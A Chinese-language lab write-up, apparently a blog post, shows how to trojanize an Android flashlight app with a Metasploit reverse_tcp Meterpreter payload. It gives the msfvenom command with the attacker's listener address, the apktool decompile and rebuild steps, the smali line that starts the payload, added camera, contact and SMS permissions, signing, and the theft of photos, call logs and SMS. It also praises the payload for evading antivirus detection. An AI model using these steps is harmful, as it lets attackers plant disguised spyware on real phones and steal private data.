1.实验内容

Metasploit后门攻击实现远程控制Android手机

2.实验环境

设备

IP

子网掩码

Kali Linux(Hack)

222.20.78.6

255.255.248.0

Android(靶机)

10.11.63.254

255.255.240.0

Metasploit是在2004年8月,在拉斯维加斯如开了一次世界黑客交流会—黑帽简报(Black Hat Briefings)提出来的一款开源的安全漏洞检测工具,可以帮助用户识别安全问题,验证漏洞的缓解措施,并对某些软件进行安全性评估,提供真正的安全风险情报。Metasploit软件为它的基础功能提供了多个用户接口,包括终端、命令行和图形化界面等。生成木马文件。

MSF终端(MSFCONSOLE)是目前Metasploit框架最为流行的用户接口,而且也是非常灵活的。MSFCONSOLE主要用于管理Metasploit数据库,管理会话、配置并启动Metasploit模块。本质上来说,就是为了利用漏洞,MSFCONSOLE将获取用户连接到主机的信息,以至于用户能启动渗透攻击目标系统。

Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外Meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。

Meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。其中,攻击者与目标设备中Meterpreter的通信是通过Stager套接字实现的meterpreter作为后渗透模块有多种类型,并且命令由核心命令和扩展库命令组成,极大的丰富了攻击方式。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。

实验流程图如下所示:

3.木马apk生成

1)apk文件准备

service postgresql start-启动postgresql数据库

Msfconsole–启动metasploit工具

msfvenom -p android/meterpreter/reverse_tcp LHOST=222.20.78.6 LPORT=5555 R > /root/apk.apk

reverse_tcp这是一个基于TCP的反向链接反弹shell,使用起来很稳定。此处LHOST为kali的ip,LPORT指定一个端口。/root/apk.apk为生成木马apk文件的路径及文件名。生成的apk文件大小为10083bytes。

在安卓应用市场下载一个安全的apk,文件名字为shoudiantong.apk。

2)Apktool反编译apk文件并注入木马

将步骤1)中的两个apk文件都放入同一文件夹中。通过以下操作指令进行反编译。

java -jar apktool_2.3.4.jar d -o outdir shoudiantong.apkjava -jar apktool_2.3.4.jar d -o apk apk.apk

得到反编译后的两个文件夹。

寻找shoudiantong.apk文件的入口,在outdir文件夹中的Manifest.xml文件中查找Main和Launch关键词,定位到所对应的启动smail文件。

打开com/tortoisekungfu/shoudiantong/MainActivety.smail文件,搜索onCreate函数,找到bundle对象,并在下面添加启动payload代码:

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

将apk.apk反编译生成的文件夹中的smail/com/metasploit文件复制到shoudiantong.apk反编译生成的文件夹的smail/com/目录下。此时已经完成了将启动payload木马注入到正常的apk中。

3)权限设置:

安卓应用市场下载的手电筒应用所需要获取的手机权限有限,为了使得payload木马监听程序对手机能进行更多功能的控制,需要赋予该apk更多的权限。手电筒功能apk具有权限如图1所示。

图1 手电筒apk原有权限

额外补充的权限见下图,额外加入的权限包括了摄像头、联系人、短信等容易泄露个人隐私信息的功能的授权。额外授权如图2所示。

图2 额外授权

4)回编译

回编译生成注入了payload后门的apk,通过以下指令实现:

java -jar apktool_2.3.4.jar b outdir

其中指令中的outdir为反编译生成的文件夹路径,回编译生成的apk文件在outdir/dist目录下。

5)签名

没有签名的apk文件在手机上进行安装时会出现解析错误。通过以下指令生成KEYSTORE。

KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

给apk文件签名:

4.手机安装apk测试

1)设置攻击机和端口号并启动:

2)显示正在监听靶机,当靶机中木马APK启动后,显示靶机和攻击机之间建立了连接。

3)查看手机系统信息:

4)查看手机摄像头信息:

5)调用摄像头拍照:

6)获取通话记录和短信记录:

通话记录:

短信记录:

7)停止监听,连接关闭:

木马渗透安卓系统实验相关推荐

  1. Metasploit之渗透安卓实战

    Metasploit之渗透安卓实战 在之前的Metaspoloit使用中都是在Windows系统中,因为渗透的是Windows系统,所以选用了"windows/meterpreter/rev ...

  2. 2021-12-09 使用kali生成木马,渗透Windows系统

    本文章仅供学习和参考! 欢迎交流~ 目录 一.实验题目:使用kali生成木马,渗透Windows系统 二.实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三.实验环境 ...

  3. 渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具

    操作系统:https://zhuanlan.zhihu.com/p/162865015 1.基于 Windows.Linux.Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali ...

  4. 苹果a10处理器_iPhone运行安卓系统卡成翔,苹果A系处理器彻底跌落神坛!

    使用iPhone的很多果粉都是有一种莫名的优越感,认为iPhone就是比安卓手机要牛X得多,这种牛X并不光光是品牌价值上的,更多则是在体验方面的,iPhone在日常流畅度,运行大型游戏的帧率和稳定性上 ...

  5. 小米高管否认鸿蒙,小米参加华为鸿蒙系统实验?小米高管终于回应,网友评论炸了!...

    原标题:小米参加华为鸿蒙系统实验?小米高管终于回应,网友评论炸了! 关于华为的自研系统鸿蒙传的沸沸扬扬的,有说8月份就会出的,有说跟着下半年旗舰华为Mate 30一起 出的,也有说是明年才能见到,但总 ...

  6. 苹果4s怎么越狱_只有老外有空去玩这些,在苹果手机上刷入了安卓系统

    iPhone 的历史有多久,越狱的历史就有多久.2007年初代 iPhone 问世,没过几天就出现了越狱,越狱的灵魂之一.开源软件商店 Cydia 甚至比App Store出现的时间还要早 5 个月. ...

  7. a12处理器怎么样_iPhone运行安卓系统卡成翔,苹果A系处理器彻底跌落神坛!

    使用iPhone的很多果粉都是有一种莫名的优越感,认为iPhone就是比安卓手机要牛X得多,这种牛X并不光光是品牌价值上的,更多则是在体验方面的,iPhone在日常流畅度,运行大型游戏的帧率和稳定性上 ...

  8. android gps距离计算器,计算器刷成安卓系统 刷系统千万别找设计师

    近日新浪微博一网友发图称自己把计算器刷成了Android系统:"其实SHARP的CPU不算太小,所以我果断装了几个软件."于是-掀起了各种电器刷机狂潮,单反.PSP.Kindle. ...

  9. ios系统和android比较大小,iOS系统和安卓系统对比,有哪些优势和不足?

    原标题:iOS系统和安卓系统对比,有哪些优势和不足? iOS和安卓一直都是两家对立的操作系统,安卓加上iOS的市场份额基本上就可以达到100%左右,剩下的都是一些不知名的小操作系统,当然原来windo ...

最新文章

  1. 【最小树形图(奇怪的kruskal)】【SCOI 2012】【bzoj 2753】滑雪与时间胶囊
  2. Nagios 3.x 在线帮助中文版
  3. 【Flink】Flink 源码阅读笔记(20)- Flink 基于 Mailbox 的线程模型
  4. JZOJ 1385. 直角三角形
  5. 【openeuler 21.3】Linux硬盘分区、更改/home目录挂载空间及root目录扩容
  6. python爬虫遇到动态加密怎么办?爬取某点评网站内容
  7. iMeta | 北大陈峰/陈智滨等发表口腔微生物组研究中各部位取样的实验方法(Protocol)...
  8. boost入门(四):Asio实现网络通信
  9. C# 读取Word文本框中的文本、图片和表格(附VB.NET代码)
  10. ChemDraw怎么画3D图?
  11. python机器人编程——差速机器人小车的控制,控制模型、轨迹跟踪,轨迹规划、自动泊车(上)
  12. 计算机管理guest用户在哪,电脑来宾账户权限设置怎么设置
  13. 1.树莓派Pi3简介
  14. SimpleDateFormat的使用:SimpleDateFormat对日期Date类的格式化和解析
  15. 计算机应用基础——计算机软件(三)
  16. MATLAB批量读取航摄相片EXIF信息和GNSS信息以及MATLAB批量经纬度坐标转换空间直角坐标
  17. docker 安装与初步使用
  18. android英语,Android 每日一句(英语)
  19. 坚果云 同步根目录重叠
  20. C 区间之和 SDUT

热门文章

  1. python编的俄罗斯方块游戏下载_用python写一个俄罗斯方块小游戏
  2. Windows命令行复制文件
  3. 大学计算机(计算机文化基础)练习题
  4. VLC Media Player的简介
  5. jQuery lightBox plugin 灯箱效果
  6. 职业规划之前请认真读读以下19个故事(3)
  7. Linux安全漏洞如何进行修复?
  8. 如何让自己做任何事情都很有条理?适合规划工作计划的清单便签
  9. Python课程第一天_上午_课程笔记(硬件以及进制)
  10. java 搜索_Java实现搜索功能代码详解